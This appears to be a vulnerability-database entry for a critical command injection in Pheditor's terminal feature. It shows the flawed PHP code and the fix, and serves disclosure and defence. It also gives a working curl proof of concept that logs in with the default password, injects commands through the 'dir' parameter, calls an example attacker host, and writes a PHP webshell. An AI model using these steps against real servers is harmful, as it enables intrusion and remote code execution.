CVE-2026-48030Critical· 9.9▾ AbyssalPoC availablePheditor: OS Command Injection in terminal handler via unsanitized 'dir' parameter
▾ Abyssal zone — Critical with a public exploit or in-the-wild use
impact 54.5 · likelihood 1.2 · exploitation 12
A public proof-of-concept already exists for this vulnerability — see Exploit availability below.
Public exploit / PoC code seen in 2 sources. Availability, not in-the-wild use.
Exploit-prediction probability, daily snapshots since Jul 28.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via GHSA
1.5%
1.5% → 5.8%
1 GitHub repo · Nuclei ×1
An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the 'dir' POST parameter, completely bypassing the TERMINAL_COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.
The terminal handler in pheditor.php accepts two POST parameters: command and dir. Shell metacharacters are validated on $command only — $dir is passed to shell_exec() without any sanitization.
Vulnerable code (pheditor.php, line 554–586):
$command = $_POST['command']; // ✓ metacharacters checked
$dir = $_POST['dir']; // ✗ NOT checked — vulnerable
if (strpos($command, '&') !== false ||
strpos($command, ';') !== false ||
strpos($command, '||') !== false) {
die(...); // only guards $command, not $dir
}
$output = shell_exec(
(empty($dir) ? null : 'cd ' . $dir . ' && ')
. $command . ' && echo \ ; pwd' // ← $dir injected here
);
An attacker sends dir=/tmp; curl attacker.com # — the semicolon in $dir is never checked, so the injected command executes freely.
Fix: replace $dir with escapeshellarg($dir) on line 586.
Requirements: valid credentials, terminal permission enabled (default)
Step 1 — Authenticate:
curl -c cookies.txt -X POST http://TARGET/pheditor.php \
-d "pheditor_password=admin" -L > /dev/null
Step 2 — Get CSRF token:
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
Step 3 — Confirm curl is blocked via command field:
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=curl https://ifconfig.me" \
--data-urlencode "dir=/tmp"
→ {"error":true,"message":"Command not allowed"}
Step 4 — Bypass whitelist via dir injection:
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"
→ {"error":false,"message":"OK","dir":"<PUBLIC_IP>"}
Step 5 — Full RCE via webshell:
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/var/www/html; echo '<?php system($_GET["c"]);?>' > /var/www/html/shell.php #"
curl "http://TARGET/shell.php?c=id"
→ uid=33(www-data) gid=33(www-data) groups=33(www-data)
OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (default configuration) is able to:
pheditor/pheditor >= 2.0.1, <= 2.0.3Upgrade to a patched release:
pheditor/pheditor 2.0.4Field changes observed since this record was first indexed.
Connected by shared product, vendor, weakness, or advisory.
GHSA-g3hq-hphg-8fhhHigh· 8.8Pheditor: Terminal command-allowlist bypass via argument injection leads to RCE — surviving vector after the metacharacter-sanitization fixes
CVE-2026-54540High· 8.8Pheditor has an authenticated terminal command whitelist bypass
CVE-2026-55578High· 8.8Pheditor: Incomplete command sanitization in terminal feature allows RCE via pipe operator, backtick substitution, and newline injection
CVE-2026-55579Critical· 9.8Pheditor: Hardcoded default password 'admin' with no forced change enables full application compromise
GHSA-f25v-x6vr-962gCritical· 10.0Pheditor: Authentication Bypass in Forced Password-Change Flow via Unverified Current Password
CVE-2018-11138Critical· 9.8The '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by anonymous users and can be abused to execute arbitrary commands on the system.